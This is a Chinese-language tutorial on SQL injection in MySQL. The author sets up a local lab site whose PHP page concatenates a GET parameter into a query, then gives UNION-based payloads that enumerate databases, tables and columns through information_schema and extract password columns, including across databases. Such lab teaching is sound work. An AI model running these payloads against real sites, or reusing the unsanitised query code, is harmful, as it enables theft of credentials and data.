sql注入漏洞--MYSQL两种思路

在学习之前,先自己搭建了一个网站

在前端可以实现与后端数据库的交互查询

创建一个数据库名为wy,表名为users

建立字段,定义类型

插入数据

php 复制代码
INSERT INTO `users`(`name`, `password`,`photo`, `money`) VALUES ("DuZZ",123456,11,100);
INSERT INTO `users`( `name`, `password`, `photo`, `money`) VALUES ("GuQQ",654321,22,100);

确认

index.php

php 复制代码
<?php
$dbHost = "127.0.0.1";  //数据库地址
$dbUser = "root"; //登录数据库的用户名
$dbPass = "root";//登录数据库的密码
$dbName = "wy";//数据库的名称   
$link = @new mysqli($dbHost, $dbUser, $dbPass, $dbName); //建立数据库
if ($link->connect_error) 
{
    echo $mysqli->connect_error; 捕获数据库连接时的错误信息
}
if (isset($_GET['param'])) // 检查是否有传递的参数
{
    $param = $_GET['param'];
    $sql = "SELECT * FROM users WHERE id = '$param'";// 使用参数构建查询语句
} 
else 
{ 
    $sql = "SELECT * FROM users";// 默认查询语句
}

if ($results = mysqli_query($link, $sql)) //mysqli_query函数执行失败时返回 false,通过mysqli_query() 成功执行SELECT, SHOW, DESCRIBE或 EXPLAIN查询会返回一个mysqli_result 对象,其他查询则返回true。
{
    while ($result = mysqli_fetch_assoc($results)) //使用mysqli_fetch_assoc函数获取返回对象中的具体数据。
    {
        var_dump($result);  //输出每一行的数据
        echo "<hr/>";  //在输出之间添加<hr/>标签,以在结果之间添加水平分隔线。
    }
} 
else 
{
    die(mysqli_error($link)); //捕获SQL语句的错误,并结束脚本运行
}
$link->close();
?>

访问一下

通过get传参查询

相关函数:

sql注入漏洞

脚本代码在实现代码与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),将定义的sql语句进行执行查询数据时。其中的SQL语句能通过参数传递自定义值来实现控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感数据,如管理员帐号密码)

复制代码
$i=$_GET[id];//GET请求接受id参数名值给变i

$sql="select * from sy_guestbook where id=$i";

//?id=1 
//select *from sy_guestbook where id=1

//id=1 and
//select *from sy_guestbook where id=1 and

MYSQL 统一管理

最高数据库用户=root用户

数据库A-->网站A-->数据库用户A

表名

数据

数据库B-->网站B-->数据库用户B

数据库C-->网站C-->数据库用户C

为了网站和数据库的安全性,mysql内置有ROOT最高用户,划分等级,每个用户对应管理一个数据库,这样保证无不关联,从而不会影响到其他数据库的运行。

MYSQL两种思路

1、非ROOT的注入攻击: 常规类的猜解

2、ROOT用户的注入攻击: 文件读写操作,跨库查询注入等

MYSQL5.0以上版本:自带的数据库名information_schema

information_schema: 存储数据库下的数据库名及表名,列名信息的数据库

information_schema.tables:记录表名信息的表

information_schema.columns: 记录列名信息表

获取相关数据:

数据库版本-看是否符合information schema查询

-version()-5.7.26

数据库用户-看是否符合ROOT型注入攻击

-user()-root@localhost

当前操作系统-看是否支持大小写或文件路径选择

-@@version_compile_os-win64

数据库名字-为后期猜解指定数据库下的表,列做准备

-database()-wy

ROOT类型攻击-猜解数据,文件读写,跨库查询

获取wy数据库下面的表名信息:

php 复制代码
?param=-1' union select 1,2,3,4,table_name from information_schema.tables where table_schema='wy' --+

获取表名wy的列名信息:

php 复制代码
?param=-1' union select 1,2,3,4,column_name from information_schema.columns where table_name='users' and table_schema='wy'--+

获取指定数据:

php 复制代码
?param=-1' union select 1,2,3,4,password from wy.users --+

跨库注入

就是如果你是root用户,根据上面的假设,我是在wy这个数据库中进行查询的,但是如果我想要在其他的库中进行查询,那么我们就先在information_schema.schemata这个表中查询其他的库(下文为security),然后指定想要查询的库进行查询

获取当前MySQL 下的所有数据库名

php 复制代码
?param=-1' union select 1,2,3,4,schema_name from information_schema.schemata --+

获取数据库名为security下的表名信息

复制代码
?param=-1' union select 1,2,3,4,table_name from information_schema.tables where table_schema='security' --+

获取表名为users的列名信息

复制代码
?param=-1' union select 1,2,3,4,column_name from information_schema.columns where table_schema='security' and table_name='users' --+

获取指定数据

php 复制代码
?param=-1' union select 1,2,3,4,password from security.users --+
相关推荐
这儿有一堆花32 分钟前
安全访问家中 Linux 服务器的远程方案 —— 专为单用户场景设计
linux·服务器·安全
饮长安千年月4 小时前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
大咖分享课4 小时前
容器安全最佳实践:云原生环境下的零信任架构实施
安全·云原生·架构
淡水猫.5 小时前
ApacheSuperset CVE-2023-27524
安全·web安全
恰薯条的屑海鸥6 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)
网络·学习·安全·web安全·渗透测试·csrf·网络安全学习
Bruce_Liuxiaowei6 小时前
Web安全深度解析:源码泄漏与未授权访问漏洞全指南
安全·web安全
代码搬运媛7 小时前
React 中 HTML 插入的全场景实践与安全指南
安全·react.js·html
珹洺9 小时前
数据库系统概论(十七)超详细讲解数据库规范化与五大范式(从函数依赖到多值依赖,再到五大范式,附带例题,表格,知识图谱对比带你一步步掌握)
java·数据库·sql·安全·oracle
恰薯条的屑海鸥10 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十期-Over Permission 模块)
学习·安全·web安全·渗透测试·网络安全学习
Web极客码20 小时前
如何轻松、安全地管理密码(新手指南)
计算机网络·安全·web安全·网络安全